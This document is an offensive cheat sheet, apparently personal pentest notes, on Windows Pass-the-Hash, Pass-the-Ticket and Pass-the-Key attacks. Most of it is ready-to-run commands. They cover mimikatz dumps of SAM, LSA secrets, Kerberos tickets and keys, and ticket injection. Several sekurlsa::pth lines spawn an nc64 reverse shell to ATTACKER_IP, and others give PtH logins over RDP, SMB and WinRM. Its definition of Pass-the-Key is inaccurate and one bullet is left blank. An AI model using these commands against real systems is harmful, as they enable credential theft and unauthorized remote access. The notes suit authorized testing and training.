## General

Alternate authentication with Pass-the-Hash (PtH), Pass-the-Ticket (PtT), and Pass-the-Key (PtK) refers to methods of authenticating to a system without providing a plaintext password.

Pass-the-Hash (PtH) is an attack technique that lets an attacker use a stolen password hash to authenticate to a system without knowing the plaintext password. This is done by capturing the NTLM or LM hash of a user's password, which is stored on a Windows system when the user logs in.

Pass-the-Ticket (PtT) is an attack technique that lets an attacker use a stolen Kerberos ticket to authenticate to a system without knowing the plaintext password. This is done by capturing the Kerberos ticket issued to a user when they log in, and then using it to authenticate to other systems on the network.

Pass-the-Key (PtK) is an attack technique that lets an attacker use a stolen encryption key to decrypt sensitive data without knowing the plaintext password. This is done by capturing the key used to encrypt a user's data and then using it to decrypt the data (stealing the encryption key of the tickets).

All these methods are used by attackers to gain unauthorized access to a system by bypassing normal authentication mechanisms.

- PtH = using the hash to connect
- PtT = using the ticket to connect
- PtK =

LOCAL VS ACTIVE DIRECTORY

With tools such as mimikatz, you can gather local hashes and Active Directory hashes from users. Note that mimikatz is not the only tool you can use to find hashes, tickets and keys.

## Commands

To begin, one must acquire some hashes, tickets, or keys. This can be done using tools such as Mimikatz.
- Upload Mimikatz to the target system

## Alternate Authentication (PtH)

```
mimikatz # privilege::debug
mimikatz # token::elevate

# Local users
lsadump::sam

# AD users
sekurlsa::msv

# Set up a listener (attacking machine)
nc -lvnp PORT

# Launch a reverse shell (using nc64 on the other machine; other techniques can launch a reverse shell, for example smb/psexec in msfconsole)
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTLM_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

- Other techniques to pass the hash

```
RDP   --> xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
SMB   --> psexec.py -hashes :NTLM_HASH DOMAIN/MyUser@VICTIM_IP   (Impacket expects LMHASH:NTHASH; the LM part may be left empty)
WinRM --> evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
```

## Alternate Authentication (PtT)

```
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

# Inject a ticket into the current session (change the ticket filename)
kerberos::ptt [0;427fcd5]-2-0-40e10000-USER@MACHINE_DOMAIN

# Check that the ticket is now loaded in the session
C:\> klist
```

## Alternate Authentication (PtK)

```
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

# Set up a listener (attacking machine)
nc -lvnp PORT
```

**If we have the RC4 hash:**

```shell-session
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /rc4:RC4_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

**If we have the AES128 hash:**

```shell-session
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes128:AES128_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

**If we have the AES256 hash:**

```shell-session
mimikatz # sekurlsa::pth /user:USER /domain:DOMAIN /aes256:AES256_HASH /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"
```

## Dump LSAdump

```
mimikatz # token::elevate
mimikatz # lsadump::secrets
```